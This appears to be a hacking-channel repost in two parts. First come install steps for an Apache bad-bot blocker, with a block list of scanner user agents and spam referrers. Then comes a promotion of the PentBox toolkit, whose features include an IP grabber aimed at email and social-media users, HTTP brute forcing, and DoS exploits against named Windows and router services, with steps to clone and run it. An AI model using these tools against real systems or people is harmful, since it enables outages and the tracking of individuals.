> sudo apache2ctl configtest

> sudo service apache2 reload

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

🦑 from 2 months All in One

> Apache Block Bad Bots

> (Referer) Spam Referrer Blocker,

> Vulnerability Scanners, Malware, Adware, Ransomware, Malicious Sites,

> Wordpress Theme Detectors and Fail2Ban Jail for Repeat Offenders
instagram.com/UnderCodeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:


1) clone https://github.com/mitchellkrogza/apache-ultimate-bad-bot-blocker

2) COPY THE GLOBALBLACKLIST.CONF FILE FROM THE REPO $APACHE_CONF is generally located at /etc/apache2 or /etc/httpd depending on OS

3) Copy the contents of globalblacklist.conf into your $APACHE_CONF/custom.d folder. e.g. /etc/apache2/custom.d on Ubuntu/Debian /etc/httpd on RHEL/centos You need to create this folder.

4) The following directions use /etc/apache2 as an example.

> sudo mkdir /etc/apache2/custom.d

> sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/globalblacklist.conf -O /etc/apache2/custom.d/globalblacklist.conf

5) If your Linux distribution does not have wget you can replace the wget commands using curl as follows:

> curl -sL https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/globalblacklist.conf -o /etc/apache2/custom.d/globalblacklist.conf

6) Please do NOT ever use 127.0.0.1 as a whitelisted IP address in whitelist-ips.conf it will cause the blocker to stop functioning.

> copy the whitelist-ips.conf file into that folder

7) sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/whitelist-ips.conf -O /etc/apache2/custom.d/whitelist-ips.conf

8) copy the whitelist-domains.conf file into the same folder

9) sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/whitelist-domains.conf -O /etc/apache2/custom.d/whitelist-domains.conf

10) Use nano, vim or any other text editor to edit both whitelist-ips.conf and whitelist-domains.conf to include all your own domain names and IP addresses that you want to specifically whitelist from the blocker script.

11) copy the blacklist-ips.conf file into that folder

> sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/blacklist-ips.conf -O /etc/apache2/custom.d/blacklist-ips.conf

12) copy the bad-referrer-words.conf file into that folder

> sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/bad-referrer-words.conf -O /etc/apache2/custom.d/bad-referrer-words.conf

13) Allows you to add your own custom list of user agents with this new include file.

> copy the blacklist-user-agents.conf file into that folder

> sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/blacklist-user-agents.conf -O /etc/apache2/custom.d/blacklist-user-agents.conf

14) INCLUDE THE GLOBALBLACKLIST.CONF

Include the globalblacklist.conf file in the beginning of a directory block just after your opening Options statements and before the rest of your host config example below. Remove the "<<<<<< This needs to be added" part

<VirtualHost *:80>
ServerName local.dev
DocumentRoot /var/www/html
ErrorLog /tmp/error.log

<Directory "/var/www/html">
Options +Includes
Options +FollowSymLinks -Indexes
Include custom.d/globalblacklist.conf
</Directory>
</VirtualHost>

15) You can include globalblacklist.conf globally (for all virtual hosts) if you put the following configuration after virtual host configuration.

16) Do an Apache2 Config Test

> sudo apache2ctl configtest

> sudo service apache2 reload

17) Now Open Terminal & Type :

> curl -A "googlebot" http://yourdomain.com

Should respond with 200 OK

> curl -A "80legs" http://yourdomain.com

> curl -A "masscan" http://yourdomain.com

Should respond with 403 Forbidden

> curl -I http://yourdomain.com -e http://100dollars-seo.com

> curl -I http://yourdomain.com -e http://zx6.ru

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

🦑Termux 2019 tool :
PentBox is a tool that allows us to create honeypot in systema this is written in ruby language
t.me/UnderCodeTesting

🦑Features:

> Command execution in gets (STDIN) implemented. (!command)

> Honeypot now shows attacker's IP and port (thx Shyish)

> Ip grabber direct targeting from email: yahoo,gmail,hotmail & sites like facebook gmail ...etc

> Included log options.

> Wordlist is bigger now.

> Included "back" option on menus. New tools:

> Included new area, Web tools.

> Included new module MAC address geolocation (samy.pl).

> Included new module HTTP directory bruteforce.

> Included new module HTTP common files bruteforce.

> Included exploits for DoS [other/http] 3Com SuperStack Switch DoS [other/http] 3Com OfficeConnect Routers DoS (Content-Type) [windows/

>ftp] Windows 7 IIS7.5 FTPSVC UNAUTH'D DoS [windows/ftp] Solar FTP Server 2.1 DoS [windows/pptp] MS02-063 PPTP Malformed Control Data

>Kernel DoS [windows/smb] Windows Vista/7 SMB2.0 Negotiate Protocol Request DoS BSOD

> Included pb_update.rb to update PenTBox from the SVN repository. Bugfixing:

> Fixed issue with SHODAN API.

> Deleted l33t speak and extra menu.

> Improved permissions checking, now it's done by euid, not username (thx r4mosg)

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/technicaldada/pentbox

2) cd pentbox

3) tar -zxvf pentbox.tar.gz

4) cd pentbox

5) chmod 777 pentbox.rb

6) ./pentbox.rb

Written by ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁